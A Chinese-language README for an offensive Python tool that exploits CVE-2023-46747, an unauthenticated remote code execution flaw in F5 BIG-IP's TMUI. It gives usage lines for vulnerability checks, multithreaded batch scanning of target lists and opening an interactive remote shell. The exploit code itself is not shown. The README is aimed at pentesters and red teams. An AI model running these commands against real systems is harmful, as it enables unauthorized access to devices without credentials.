这是一个 Python3 脚本,用于利用 F5 BIG-IP 设备上通过 TMUI 接口的未认证远程代码执行漏洞(CVE-2023-46747)。基本上,如果此漏洞被利用,你可以在无需凭证的情况下获得 shell。
内建线程支持、文件输入支持、代理处理、可选的 shell 访问,并可批量检查易受攻击的目标。专为需要快速且粗糙自动化的安全研究人员、渗透测试人员和红队成员打造。
/tmui/login.jsp 的未认证访问python3 bigrce.py -u https://<target> --check
python3 bigrce.py -u https://<target> --shell
python3 bigrce.py -f targets.txt -t 20 --check
python3 bigrce.py -f targets.txt --shell --proxy http://127.0.0.1:8080
-u <url>:单目标模式-f <file>:目标列表文件(每行一个)-t <threads>:线程数(默认:5)--check:仅检查目标是否易受攻击--shell:启动交互式 RCE shell-p <proxy>:通过 Burp/ZAP 代理流量requestscolorama(可选,用于彩色输出)如有需要,可通过 pip 安装:
pip3 install requests colorama
https://192.168.1.1
192.168.1.2
bigip.company.internal
若缺少 HTTPS,它会自动补全。
由 cediegreyhat 创建——此仓库的灵感来源于评估过程中的实际使用。欢迎根据需要进行修改和扩展。
保持安全。负责任地进行黑客行为。🐉
如果你希望改进此工具,欢迎提交 PR!